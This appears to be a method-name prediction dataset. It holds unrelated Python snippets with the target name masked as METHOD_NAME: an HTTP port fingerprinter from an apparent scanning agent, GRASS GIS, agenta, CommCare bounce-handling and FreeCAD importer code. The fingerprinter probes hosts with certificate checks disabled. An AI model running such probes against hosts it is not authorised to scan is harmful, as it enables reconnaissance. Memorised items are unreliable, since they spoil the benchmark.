        ports_to_fingerprint = _get_open_http_ports(http_ports, port_scan_data)
        timestamp = time.time()
        for port in ports_to_fingerprint:
            service = self._query_potential_http_server(host, port)
            if service:
                services.append(
                    DiscoveredService(
                        protocol=NetworkProtocol.TCP, port=NetworkPort(port), service=service
                    )
                )
        # If there were no ports worth fingerprinting (i.e. no actual fingerprinting action took
        # place), then we don't want to publish an event.
        if len(ports_to_fingerprint) > 0:
            self._publish_fingerprinting_event(host, timestamp, services)
        return FingerprintData(os_type=None, os_version=None, services=services)
    def _query_potential_http_server(self, host: str, port: int) -> Optional[NetworkService]:
        """Return HTTPS/HTTP when *port* answers a HEAD request, else None."""
        # check both http and https
        http = f"http://{host}:{port}"
        https = f"https://{host}:{port}"
        for url, ssl in ((https, True), (http, False)):  # start with https and downgrade
            server_header = self._get_server_from_headers(host, url)
            if server_header is not None:
                return NetworkService.HTTPS if ssl else NetworkService.HTTP
        return None
    def _get_server_from_headers(self, host: str, url: str) -> Optional[str]:
        """HEAD *url* and return its Server header.

        Returns "" when the response carried no Server header (still counts
        as a live HTTP(S) endpoint) and None when no response was received.
        """
        timestamp = time.time()
        headers = _get_http_headers(url)
        # The request is reported whether or not it succeeded.
        self._publish_http_request_event(host, timestamp, url)
        if headers:
            return headers.get("Server", "")
        return None
    def _publish_http_request_event(self, host: str, timestamp: float, url: str):
        """Publish an HTTPRequestEvent describing the HEAD request made."""
        self._agent_event_publisher.publish(
            HTTPRequestEvent(
                source=self._agent_id,
                target=IPv4Address(host),
                timestamp=timestamp,
                tags=EVENT_TAGS,  # type: ignore [arg-type]
                method=HTTPMethod.HEAD,
                url=url,  # type: ignore [arg-type]
            )
        )
    def _publish_fingerprinting_event(
        self, host: str, timestamp: float, discovered_services: Sequence[DiscoveredService]
    ):
        """Publish a FingerprintingEvent summarizing the discovered services."""
        self._agent_event_publisher.publish(
            FingerprintingEvent(
                source=self._agent_id,
                target=IPv4Address(host),
                timestamp=timestamp,
                tags=EVENT_TAGS,  # type: ignore [arg-type]
                os=None,
                os_version=None,
                discovered_services=tuple(discovered_services),
            )
        )
def _get_open_http_ports(
    allowed_http_ports: Set, port_scan_data: Dict[int, PortScanData]
) -> Sequence[int]:
    """Return scanned ports that are both open and configured for HTTP probing."""
    open_http_ports = []
    for scan_result in port_scan_data.values():
        if scan_result.status != PortStatus.OPEN:
            continue
        if scan_result.port in allowed_http_ports:
            open_http_ports.append(scan_result.port)
    return open_http_ports
def _get_http_headers(url: str) -> Optional[CaseInsensitiveDict]:
    """HEAD *url* and return the response headers, or None on timeout or
    connection failure.

    TLS certificate verification is disabled on purpose: we only care
    whether something answers HTTP, not whether its certificate is valid.
    """
    try:
        logger.debug(f"Sending request for headers to {url}")
        # closing() releases the underlying connection even though no body
        # is ever read.
        with closing(head(url, verify=False, timeout=1)) as response:  # noqa: DUO123
            return response.headers
    except Timeout:
        logger.debug(f"Timeout while requesting headers from {url}")
    except ConnectionError:  # Someone doesn't like us
        logger.debug(f"Connection error while requesting headers from {url}")
    return None
298,447 | switch mapset | # MODULE: grass.jupyter.setup
#
# AUTHOR(S): Caitlin Haedrich <caitlin DOT haedrich AT gmail>
# Vaclav Petras <wenzeslaus gmail com>
#
# PURPOSE: This module contains functions for launching a GRASS session
# in Jupyter Notebooks
#
# COPYRIGHT: (C) 2021-2022 Caitlin Haedrich, and by the GRASS Development Team
#
# This program is free software under the GNU General Public
# License (>=v2). Read the file COPYING that comes with GRASS
# for details.
"""Initialization GRASS GIS session and its finalization"""
import os
import weakref
import grass.script as gs
def _set_notebook_defaults() -> None:
    """Set defaults appropriate for Jupyter Notebooks.

    This function sets several GRASS environment variables that are
    important for GRASS to run smoothly in Jupyter.

    It also allows GRASS to overwrite existing maps of the same name.
    """
    # We want functions to raise exceptions and see standard output of
    # the modules in the notebook.
    gs.set_raise_on_error(True)
    gs.set_capture_stderr(True)
    # Allow overwrite of existing maps
    os.environ["GRASS_OVERWRITE"] = "1"
class _JupyterGlobalSession:
    """Represents a global GRASS session for Jupyter Notebooks.

    Do not create objects of this class directly. Use the standalone *init* function
    and an object will be returned to you, e.g.:

    >>> import grass.jupyter as gj
    >>> session = gj.init(...)

    An object ends the session when it is destroyed or when the *finish* method is
    called explicitly.

    Notably, only the mapset is closed, but the libraries and GRASS modules
    remain on path.
    """
    def __init__(self) -> None:
        # finalize() runs gs.setup.finish when this object is garbage
        # collected, when the interpreter exits, or when finish() is called,
        # whichever comes first (and at most once).
        self._finalizer = weakref.finalize(self, gs.setup.finish)
    def METHOD_NAME(self, path, location=None, mapset=None):
        """Switch to a mapset provided as a name or path.

        The mapset can be provided as a name, as a path,
        or as database, location, and mapset.
        Specifically, the *path* positional-only parameter can be either
        name of a mapset in the current location or a full path to a mapset.
        When location and mapset are provided using the additional parameters,
        the *path* parameter is path to a database.

        Raises ValueError if the mapset does not exist (e.g., when the name is
        misspelled or the mapset is invalid).
        """
        # The method could be a function, but this is more general (would work even for
        # a non-global session).
        # pylint: disable=no-self-use
        # Functions needed only here.
        # pylint: disable=import-outside-toplevel
        from grass.grassdb.checks import (
            get_mapset_invalid_reason,
            is_mapset_valid,
            mapset_exists,
        )
        from grass.grassdb.manage import resolve_mapset_path
        # For only one parameter, try if it is a mapset in the current location to
        # support switching only by its name.
        gisenv = gs.gisenv()
        if (
            not location
            and not mapset
            and mapset_exists(
                path=gisenv["GISDBASE"], location=gisenv["LOCATION_NAME"], mapset=path
            )
        ):
            gs.run_command("g.gisenv", set=f"MAPSET={path}")
            return
        mapset_path = resolve_mapset_path(path=path, location=location, mapset=mapset)
        if not is_mapset_valid(mapset_path):
            raise ValueError(
                _("Mapset {path} is not valid: {reason}").format(
                    path=mapset_path.path,
                    reason=get_mapset_invalid_reason(
                        mapset_path.directory, mapset_path.location, mapset_path.mapset
                    ),
                )
            )
        # This requires direct session file modification using g.gisenv because
        # g.mapset locks the mapset which is not how init and finish behave.
        # For code simplicity, we just change all even when only mapset is changed.
        gs.run_command("g.gisenv", set=f"GISDBASE={mapset_path.directory}")
        gs.run_command("g.gisenv", set=f"LOCATION_NAME={mapset_path.location}")
        gs.run_command("g.gisenv", set=f"MAPSET={mapset_path.mapset}")
    def finish(self) -> None:
        """Close the session, i.e., close the open mapset.

        Subsequent calls to GRASS GIS modules will fail because there will be
        no current (open) mapset anymore.

        The finish procedure is done automatically when process finishes or the object
        is destroyed.
        """
        self._finalizer()
    @property
    def active(self) -> bool:
        """True unless the session was finalized (e.g., with the *finish* function)"""
        return self._finalizer.alive
# Pylint 2.12.2 identifies this a constant (although it is not), so it wants uppercase.
# Holds the single module-wide session object (or None before first init).
_global_session_handle = None  # pylint: disable=invalid-name
def init(path, location=None, mapset=None, grass_path=None):
    """Initiates a GRASS session and sets GRASS environment variables.

    Calling this function returns an object which represents the session.

    >>> import grass.jupyter as gj
    >>> session = gj.init(...)

    The session is ended when `session.finish` is called or when the object is
    destroyed when kernel ends or restarts. This function returns a copy of an
    internally kept reference, so the return value can be safely ignored when not
    needed.

    The returned object can be used to switch to another mapset:

    >>> session.switch_mapset("mapset_name")

    Subsequent calls to the *init* function result in switching the mapset if
    a session is active and result in creation of new session if it is not active.
    On the other hand, if you see ``GISRC - variable not set`` after calling
    a GRASS module, you know you don't have an active GRASS session.

    :param str path: path to GRASS mapset or database
    :param str location: name of GRASS location within the database
    :param str mapset: name of mapset within location
    :param str grass_path: path to the GRASS installation (passed through to
        grass.script.setup.init)
    """
    global _global_session_handle  # pylint: disable=global-statement,invalid-name
    if not _global_session_handle or not _global_session_handle.active:
        # Create a GRASS session.
        gs.setup.init(path, location=location, mapset=mapset, grass_path=grass_path)
        # Set defaults for environmental variables and library.
        _set_notebook_defaults()
        _global_session_handle = _JupyterGlobalSession()
    else:
        # A session is already active: just switch to the requested mapset.
        _global_session_handle.METHOD_NAME(path, location=location, mapset=mapset)
    return _global_session_handle
298,448 | send docker tar | import os
from pathlib import Path
from typing import List
import agenta.config
import requests
from agenta.client.api_models import AppVariant, Image
from docker.models.images import Image as DockerImage
BACKEND_URL_SUFFIX = os.environ["BACKEND_URL_SUFFIX"]
class APIRequestError(Exception):
    """Exception to be raised when an API request fails.

    Raised by the helpers in this module with a message containing the
    backend's HTTP status code and error payload.
    """
def add_variant_to_server(app_name: str, variant_name: str, image: Image, host: str):
    """Adds a variant to the server from an already-built image.

    Arguments:
        app_name -- Name of the app
        variant_name -- Name of the variant
        image -- Image (pydantic model) the variant should run from
        host -- Base URL of the backend

    Raises:
        APIRequestError: if the backend responds with a non-200 status.
    """
    app_variant: AppVariant = AppVariant(app_name=app_name, variant_name=variant_name)
    response = requests.post(
        f"{host}/{BACKEND_URL_SUFFIX}/app_variant/add/from_image/",
        json={"app_variant": app_variant.dict(), "image": image.dict()},
        timeout=600,
    )
    if response.status_code != 200:
        error_message = response.json()
        raise APIRequestError(
            f"Request to app_variant endpoint failed with status code {response.status_code} and error message: {error_message}."
        )
def start_variant(app_name: str, variant_name: str, host: str) -> str:
    """Starts a container with the variant and exposes its endpoint.

    Arguments:
        app_name -- Name of the app the variant belongs to
        variant_name -- Name of the variant to start
        host -- Base URL of the backend

    Returns:
        The endpoint (URI) of the started container

    Raises:
        APIRequestError: if the backend responds with a non-200 status.
    """
    response = requests.post(
        f"{host}/{BACKEND_URL_SUFFIX}/app_variant/start/",
        json={"app_variant": {"app_name": app_name, "variant_name": variant_name}},
        timeout=600,
    )
    if response.status_code != 200:
        error_message = response.json()
        raise APIRequestError(
            f"Request to start variant endpoint failed with status code {response.status_code} and error message: {error_message}."
        )
    return response.json()["uri"]
def list_variants(app_name: str, host: str) -> List[AppVariant]:
    """Lists all the variants registered in the backend for an app.

    Arguments:
        app_name -- the app name to which to return all the variants
        host -- base URL of the backend

    Returns:
        a list of the variants using the pydantic model

    Raises:
        APIRequestError: if the backend responds with a non-200 status.
    """
    endpoint = f"{host}/{BACKEND_URL_SUFFIX}/app_variant/list_variants/?app_name={app_name}"
    response = requests.get(endpoint, timeout=600)
    # Check for successful request
    if response.status_code != 200:
        error_message = response.json()
        raise APIRequestError(
            f"Request to list_variants endpoint failed with status code {response.status_code} and error message: {error_message}."
        )
    return [AppVariant(**payload) for payload in response.json()]
def get_variant_by_name(app_name: str, variant_name: str, host: str) -> AppVariant:
    """Gets a variant by name.

    Arguments:
        app_name -- the app name
        variant_name -- the variant name
        host -- base URL of the backend

    Returns:
        the variant using the pydantic model

    Raises:
        APIRequestError: if the backend responds with a non-200 status.
    """
    response = requests.get(
        f"{host}/{BACKEND_URL_SUFFIX}/app_variant/get_variant_by_name/?app_name={app_name}&variant_name={variant_name}",
        timeout=600,
    )
    # Check for successful request
    if response.status_code != 200:
        error_message = response.json()
        raise APIRequestError(
            f"Request to get_variant_by_name endpoint failed with status code {response.status_code} and error message: {error_message}."
        )
    # Bug fix: the function previously validated the response but never
    # returned the variant promised by its signature and docstring.
    return AppVariant(**response.json())
def remove_variant(app_name: str, variant_name: str, host: str):
    """Removes a variant from the backend.

    Arguments:
        app_name -- the app name
        variant_name -- the variant name
        host -- base URL of the backend

    Raises:
        APIRequestError: if the backend responds with a non-200 status.
    """
    app_variant = AppVariant(app_name=app_name, variant_name=variant_name)
    # DELETE with a JSON body: serialize explicitly and set the content type,
    # since requests.delete has no `json=` convenience parameter here.
    app_variant_json = app_variant.json()
    response = requests.delete(
        f"{host}/{BACKEND_URL_SUFFIX}/app_variant/remove_variant/",
        data=app_variant_json,
        headers={"Content-Type": "application/json"},
        timeout=600,
    )
    # Check for successful request
    if response.status_code != 200:
        error_message = response.json()
        raise APIRequestError(
            f"Request to remove_variant endpoint failed with status code {response.status_code} and error message: {error_message}"
        )
def update_variant_image(app_name: str, variant_name: str, image: Image, host: str):
    """Updates an existing variant to run from a new image.

    Arguments:
        app_name -- Name of the app
        variant_name -- Name of the variant
        image -- Image (pydantic model) to switch the variant to
        host -- Base URL of the backend

    Raises:
        APIRequestError: if the backend responds with a non-200 status.
    """
    app_variant: AppVariant = AppVariant(app_name=app_name, variant_name=variant_name)
    response = requests.put(
        f"{host}/{BACKEND_URL_SUFFIX}/app_variant/update_variant_image/",
        json={"app_variant": app_variant.dict(), "image": image.dict()},
        timeout=600,
    )
    if response.status_code != 200:
        error_message = response.json()
        raise APIRequestError(
            f"Request to update app_variant failed with status code {response.status_code} and error message: {error_message}."
        )
def METHOD_NAME(
    app_name: str, variant_name: str, tar_path: Path, host: str
) -> Image:
    """Uploads a tarball of the variant's code and asks the backend to build
    a Docker image from it.

    Arguments:
        app_name -- Name of the app
        variant_name -- Name of the variant
        tar_path -- Path to the tar archive to upload
        host -- Base URL of the backend

    Returns:
        the built Image (pydantic model)

    Raises:
        APIRequestError: if the backend reports a build failure (HTTP 500).
        requests.HTTPError: for any other non-2xx response.
    """
    with tar_path.open("rb") as tar_file:
        # Long timeout: image builds are slow compared to the other endpoints.
        response = requests.post(
            f"{host}/{BACKEND_URL_SUFFIX}/containers/build_image/?app_name={app_name}&variant_name={variant_name}",
            files={
                "tar_file": tar_file,
            },
            timeout=1200,
        )
    if response.status_code == 500:
        response_error = response.json()
        error_msg = "Serving the variant failed.\n"
        error_msg += f"Log: {response_error}\n"
        error_msg += "Here's how you may be able to solve the issue:\n"
        error_msg += "- First, make sure that the requirements.txt file has all the dependencies that you need.\n"
        error_msg += "- Second, check the Docker logs for the backend image to see the error when running the Docker container."
        # Consistency fix: raise the module's APIRequestError instead of a
        # bare Exception (still caught by any existing `except Exception`).
        raise APIRequestError(error_msg)
    response.raise_for_status()
    image = Image.parse_obj(response.json())
    return image
import logging
from django.conf import settings
from django.utils.dateparse import parse_datetime
from corehq.util.metrics import metrics_counter
from corehq.util.models import (
NotificationType,
AwsMeta,
BounceType,
BouncedEmail,
PermanentBounceMeta,
ComplaintBounceMeta,
TransientBounceEmail,
)
def log_email_sns_event(message):
    """Log a summary dict of an AWS SES/SNS event message at INFO level.

    Always includes the event type, timestamp and common headers; detail
    sections (bounce, complaint, ...) are copied over only when present.
    """
    mail = message.get('mail', {})
    summary = {
        'eventType': message.get('eventType'),
        'eventTimestamp': mail.get('timestamp'),
        'commonHeaders': mail.get('commonHeaders'),
    }
    detail_keys = ('bounce', 'complaint', 'delivery', 'reject', 'failure', 'deliveryDelay')
    summary.update({key: message[key] for key in detail_keys if key in message})
    logging.info(summary)
def handle_email_sns_event(message):
    """
    This expects message to be the "Message" portion of an AWS SNS Notification as
    sent by Amazon SNS, as described here:
    https://docs.aws.amazon.com/ses/latest/DeveloperGuide/event-publishing-retrieving-sns-examples.html

    Records one bounce/complaint entry per affected recipient and emits a
    metrics counter per record; finally logs a summary of the raw message.

    :param message: (dict) the "Message" portion of the SNS notification
    :return: None
    """
    for aws_meta in METHOD_NAME(message):
        if aws_meta.notification_type == NotificationType.BOUNCE:
            if aws_meta.main_type == BounceType.PERMANENT:
                record_permanent_bounce(aws_meta)
                metrics_counter('commcare.email_sns_event.permanent_bounce_recorded')
            elif aws_meta.main_type == BounceType.TRANSIENT:
                record_transient_bounce(aws_meta)
                metrics_counter('commcare.email_sns_event.transient_bounce_recorded')
            elif aws_meta.main_type == BounceType.UNDETERMINED:
                # Undetermined bounces are recorded like permanent ones
                # (conservative), but counted under their own metric.
                record_permanent_bounce(aws_meta)
                metrics_counter('commcare.email_sns_event.undetermined_bounce_received')
        elif aws_meta.notification_type == NotificationType.COMPLAINT:
            record_complaint(aws_meta)
            metrics_counter('commcare.email_sns_event.complaint_recorded')
    # Logged unconditionally, even for notification types not handled above.
    log_email_sns_event(message)
def record_permanent_bounce(aws_meta):
    """Persist a permanent bounce: ensure a BouncedEmail row exists for the
    address, then store the bounce details once per
    (email, timestamp, sub_type) combination.

    :param aws_meta: AwsMeta with the parsed bounce details for one recipient
    """
    bounced_email, _ = BouncedEmail.objects.update_or_create(
        email=aws_meta.email,
    )
    # NOTE(review): exists()-then-create() is not atomic; concurrent SNS
    # deliveries of the same event could insert duplicates — presumably
    # acceptable here, but worth confirming.
    exists = PermanentBounceMeta.objects.filter(
        bounced_email=bounced_email,
        timestamp=aws_meta.timestamp,
        sub_type=aws_meta.sub_type,
    ).exists()
    if not exists:
        PermanentBounceMeta.objects.create(
            bounced_email=bounced_email,
            timestamp=aws_meta.timestamp,
            sub_type=aws_meta.sub_type,
            headers=aws_meta.headers,
            reason=aws_meta.reason,
            destination=aws_meta.destination,
        )
def record_complaint(aws_meta):
    """Persist a complaint: ensure a BouncedEmail row exists for the address,
    then store the complaint details once per (email, timestamp).

    :param aws_meta: AwsMeta with the parsed complaint details for one recipient
    """
    bounced_email, _ = BouncedEmail.objects.update_or_create(
        email=aws_meta.email,
    )
    # Deduplicate on (bounced_email, timestamp) only — complaints carry no
    # sub_type key in the filter, unlike permanent bounces.
    exists = ComplaintBounceMeta.objects.filter(
        bounced_email=bounced_email,
        timestamp=aws_meta.timestamp,
    ).exists()
    if not exists:
        ComplaintBounceMeta.objects.create(
            bounced_email=bounced_email,
            timestamp=aws_meta.timestamp,
            headers=aws_meta.headers,
            feedback_type=aws_meta.main_type,
            sub_type=aws_meta.sub_type,
            destination=aws_meta.destination,
        )
def record_transient_bounce(aws_meta):
    """Persist a transient bounce once per (email, timestamp).

    Unlike permanent bounces, no BouncedEmail row is created — transient
    bounces live in their own table.

    :param aws_meta: AwsMeta with the parsed bounce details for one recipient
    """
    exists = TransientBounceEmail.objects.filter(
        email=aws_meta.email,
        timestamp=aws_meta.timestamp,
    ).exists()
    if not exists:
        TransientBounceEmail.objects.create(
            email=aws_meta.email,
            timestamp=aws_meta.timestamp,
            headers=aws_meta.headers,
        )
def METHOD_NAME(message_info):
    """
    Creates a list of AwsMeta objects from the Message portion of an AWS
    SNS Notification message. One per recipient.

    Only bounce and complaint notifications produce entries; any other
    notification/event type yields an empty list.

    :param message_info: (dict) the "Message" portion of an SNS notification
    :return: (list) AwsMeta objects
    """
    aws_info = []
    mail_info = message_info.get('mail', {})
    # SES uses 'notificationType' for notifications and 'eventType' for
    # event-publishing payloads; accept either.
    notification_type = message_info.get('notificationType') or message_info.get('eventType')
    if notification_type == NotificationType.BOUNCE:
        bounce_info = message_info['bounce']
        for recipient in bounce_info['bouncedRecipients']:
            aws_info.append(AwsMeta(
                notification_type=notification_type,
                main_type=bounce_info['bounceType'],
                sub_type=bounce_info['bounceSubType'],
                timestamp=parse_datetime(bounce_info['timestamp']),
                email=recipient['emailAddress'],
                reason=recipient.get('diagnosticCode'),
                headers=mail_info.get('commonHeaders', {}),
                destination=mail_info.get('destination', []),
            ))
    elif notification_type == NotificationType.COMPLAINT:
        complaint_info = message_info['complaint']
        for recipient in complaint_info['complainedRecipients']:
            aws_info.append(AwsMeta(
                notification_type=notification_type,
                # For complaints the "main type" is the feedback type
                # (e.g. abuse); it lives on the top-level message.
                main_type=message_info.get('complaintFeedbackType'),
                sub_type=complaint_info.get('complaintSubType'),
                timestamp=parse_datetime(complaint_info['timestamp']),
                email=recipient['emailAddress'],
                reason=None,
                headers=mail_info.get('commonHeaders', {}),
                destination=mail_info.get('destination', []),
            ))
    return aws_info
def get_emails_to_never_bounce():
    """Return the list of system sender addresses that should never be
    treated as bounced.

    :return: (list) email address strings from Django settings
    """
    system_emails = [
        settings.SERVER_EMAIL,
        settings.DEFAULT_FROM_EMAIL,
        settings.SUPPORT_EMAIL,
        settings.PROBONO_SUPPORT_EMAIL,
        settings.ACCOUNTS_EMAIL,
        settings.DATA_EMAIL,
        settings.SUBSCRIPTION_CHANGE_EMAIL,
        settings.INTERNAL_SUBSCRIPTION_CHANGE_EMAIL,
        settings.BILLING_EMAIL,
        settings.INVOICING_CONTACT_EMAIL,
        settings.GROWTH_EMAIL,
        settings.MASTER_LIST_EMAIL,
        settings.SALES_EMAIL,
        settings.EULA_CHANGE_EMAIL,
        settings.PRIVACY_EMAIL,
        settings.CONTACT_EMAIL,
        settings.FEEDBACK_EMAIL,
        settings.SOFT_ASSERT_EMAIL,
        settings.DAILY_DEPLOY_EMAIL,
        settings.SAAS_OPS_EMAIL,
        settings.SAAS_REPORTING_EMAIL,
    ]
    system_emails.extend(settings.BOOKKEEPER_CONTACT_EMAILS)
    # Some of these settings may be unset (None) in a given deployment;
    # keep only actual strings.
    return [email for email in system_emails if isinstance(email, str)]
def get_bounced_system_emails():
    """Return system sender addresses that currently appear in either the
    permanent (BouncedEmail) or transient bounce tables.

    :return: (list) email address strings (may contain duplicates if an
        address appears in both tables)
    """
    system_emails = get_emails_to_never_bounce()
    general_bounces = (
        BouncedEmail.objects
        .filter(email__in=system_emails)
        .values_list('email', flat=True)
    )
    transient_bounces = (
        TransientBounceEmail.objects
        .filter(email__in=system_emails)
        .values_list('email', flat=True)
    )
    return list(general_bounces) + list(transient_bounces)
# PlmXmlParser
#***************************************************************************
#* Copyright (c) 2015 Juergen Riegel <FreeCAD@juergen-riegel.net> *
#* *
#* This file is part of the FreeCAD CAx development system. *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* FreeCAD is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Lesser General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with FreeCAD; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************/
import xml.etree.ElementTree as ET
FreeCAD_On = False
FreeCAD_Doc = None
FreeCAD_ObjList = []
def ParseUserData(element):
    """Collect all UserValue title/value attribute pairs found under the
    element's UserData children, as a plain dict (later titles win)."""
    return {
        user_value.attrib['title']: user_value.attrib['value']
        for user_data in element.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}UserData')
        for user_value in user_data.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}UserValue')
    }
def addPart(partElement):
    """Read a PLMXML Part element of type 'solid' and, when FreeCAD is
    active, create an App::Part document object carrying its user data.

    The created object is appended to FreeCAD_ObjList for the later
    reference-resolution pass.
    """
    global FreeCAD_On, FreeCAD_Doc, FreeCAD_ObjList
    print("=== Part ======================================================")
    name = partElement.attrib['name']
    # `id` shadows the builtin; kept as-is since it is the PLMXML object id.
    id = partElement.attrib['id']
    userData = ParseUserData(partElement)
    bound = partElement.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}Bound')
    print(bound.attrib['values'])
    representation = partElement.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}Representation')
    # NOTE(review): format/location (the external geometry file) are printed
    # but not stored on the created object yet.
    format = representation.attrib['format']
    location = representation.attrib['location']
    print(id, name, userData, format, location)
    if FreeCAD_On:
        import FreeCAD, Assembly
        print("Create Reference")
        partObject = FreeCAD_Doc.addObject("App::Part", id)
        FreeCAD_ObjList.append(partObject)
        partObject.Label = name
        partObject.Meta = userData
def addAssembly(asmElement):
    """Read a PLMXML Part element of type 'assembly' and, when FreeCAD is
    active, create an Assembly::Product object carrying its user data.

    The space-separated instanceRefs id list is stashed in the object's Meta
    so resolveRefs() can wire up the children later.
    """
    global FreeCAD_On, FreeCAD_Doc, FreeCAD_ObjList
    print("=== Assembly ======================================================")
    userData = ParseUserData(asmElement)
    name = asmElement.attrib['name']
    id = asmElement.attrib['id']
    instanceRefs = asmElement.attrib['instanceRefs']
    userData['instanceRefs'] = instanceRefs
    print(id, name, instanceRefs, userData)
    if FreeCAD_On:
        import FreeCAD, Assembly
        print("Create Reference")
        admObject = FreeCAD_Doc.addObject("Assembly::Product", id)
        FreeCAD_ObjList.append(admObject)
        admObject.Label = name
        admObject.Meta = userData
def METHOD_NAME(refElement):
    """Read a PLMXML Instance element and, when FreeCAD is active, create an
    Assembly::ProductRef object for it.

    The referenced part id is stored in Meta['partRef'] so resolveRefs() can
    link the actual object later.
    """
    global FreeCAD_On, FreeCAD_Doc, FreeCAD_ObjList
    print("=== Reference ======================================================")
    userData = ParseUserData(refElement)
    # partRef is prefixed with '#'; strip it so it matches target object ids.
    partRef = refElement.attrib['partRef'][1:]
    userData['partRef'] = partRef
    id = refElement.attrib['id']
    name = refElement.attrib['name']
    transform = refElement.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}Transform')
    # Space-separated floats — presumably a placement matrix; currently only
    # printed, not applied to the created object (TODO confirm layout).
    mtrx = [float(i) for i in transform.text.split(' ')]
    print(mtrx)
    print(id, name, partRef)
    if FreeCAD_On:
        import FreeCAD, Assembly
        print("Create Reference")
        refObject = FreeCAD_Doc.addObject("Assembly::ProductRef", id)
        FreeCAD_ObjList.append(refObject)
        refObject.Label = name
        refObject.Meta = userData
def resolveRefs():
    """Second pass: wire up the Items/Item links between the objects created
    during parsing, using the ids stored in each object's Meta."""
    global FreeCAD_On, FreeCAD_Doc, FreeCAD_ObjList
    print("=== Resolve References ======================================================")
    if FreeCAD_On:
        for i in FreeCAD_ObjList:
            if i.TypeId == 'Assembly::Product':
                objectList = []
                # instanceRefs is a space-separated list of object ids.
                for l in i.Meta['instanceRefs'].split(' '):
                    objectList.append(FreeCAD_Doc.getObject(l))
                i.Items = objectList
            if i.TypeId == 'Assembly::ProductRef':
                i.Item = FreeCAD_Doc.getObject(i.Meta['partRef'])
def open(fileName):
    """called when freecad opens an PlmXml file

    Creates a fresh document named after the file, then parses the PLMXML
    and resolves object references.

    NOTE: deliberately shadows the builtin open() — presumably FreeCAD's
    importer protocol looks up a module-level function with this name.
    """
    global FreeCAD_On, FreeCAD_Doc
    import FreeCAD, os
    docname = os.path.splitext(os.path.basename(fileName))[0]
    doc = FreeCAD.newDocument(docname)
    message = 'Started with opening of "' + fileName + '" file\n'
    FreeCAD.Console.PrintMessage(message)
    # Enable object creation in the module-level helpers.
    FreeCAD_Doc = doc
    FreeCAD_On = True
    parse(fileName)
    resolveRefs()
def insert(filename, docname):
    """called when freecad imports an PlmXml file

    Imports into the existing document *docname* (unlike open(), which
    creates a new document), then parses and resolves references.
    """
    global FreeCAD_On, FreeCAD_Doc
    import FreeCAD
    FreeCAD.setActiveDocument(docname)
    doc = FreeCAD.getDocument(docname)
    FreeCAD.Console.PrintMessage('Started import of "' + filename + '" file')
    # Enable object creation in the module-level helpers.
    FreeCAD_Doc = doc
    FreeCAD_On = True
    # Bug fix: was `parse(fileName)` — a NameError, since this function's
    # parameter is spelled `filename`.
    parse(filename)
    resolveRefs()
def main():
    # Standalone entry point: parse a sample PLMXML from the test data tree.
    # No FreeCAD document objects are created in this mode (FreeCAD_On stays False).
    parse('../../../../data/tests/Jt/Engine/2_Cylinder_Engine3.plmxml')
def parse(fileName):
    """Parse a PLMXML file: print a summary of the InstanceGraph, then create
    objects for every Instance and every solid/assembly Part via the
    module-level add* helpers (which are no-ops unless FreeCAD_On is set)."""
    tree = ET.parse(fileName)
    root = tree.getroot()
    ProductDef = root.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductDef')
    # NOTE(review): `res` is computed but never used — the ProductDef-level
    # user data is currently discarded.
    res = ParseUserData(ProductDef.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}UserData'))
    InstanceGraph = ProductDef.find('{http://www.plmxml.org/Schemas/PLMXMLSchema}InstanceGraph')
    # get all the special elements we can read
    Instances = InstanceGraph.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}Instance')
    Parts = InstanceGraph.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}Part')
    ProductInstances = InstanceGraph.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductInstance')
    ProductRevisionViews = InstanceGraph.findall('{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductRevisionView')
    # Diagnostic dump: every distinct child tag plus counts of the known ones.
    instanceTypesSet = set()
    for child in InstanceGraph:
        instanceTypesSet.add(child.tag)
    print("All types below the InstanceGraph:")
    for i in instanceTypesSet:
        print(i)
    print("")
    print(len(Instances), '\t{http://www.plmxml.org/Schemas/PLMXMLSchema}Instance')
    print(len(Parts), '\t{http://www.plmxml.org/Schemas/PLMXMLSchema}Part')
    print(len(ProductInstances), '\t{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductInstance')
    print(len(ProductRevisionViews), '\t{http://www.plmxml.org/Schemas/PLMXMLSchema}ProductRevisionView')
    # handle all instances
    for child in Instances:
        METHOD_NAME(child)
    #handle the parts and assemblies
    for child in Parts:
        if 'type' in child.attrib:
            if child.attrib['type'] == 'solid':
                addPart(child)
                continue
            if child.attrib['type'] == 'assembly':
                addAssembly(child)
                continue
            print("Unknown Part type:", child)
        else:
            print("not Type in Part", child)
# Allow running this importer as a standalone script (uses main()'s sample file).
if __name__ == '__main__':
    main()
# Copyright 2018 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Scanner for Enabled APIs."""
import json
from google.cloud.forseti.common.gcp_type.project import Project
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.scanner.audit import enabled_apis_rules_engine
from google.cloud.forseti.scanner.scanners import base_scanner
LOGGER = logger.get_logger(__name__)
class EnabledApisScanner(base_scanner.BaseScanner):
    """Scanner for enabled APIs.

    Pipeline (see run()): retrieve per-project enabled-API data from the
    model, evaluate it against the rules engine, flatten the violations and
    write them to the violations table.
    """

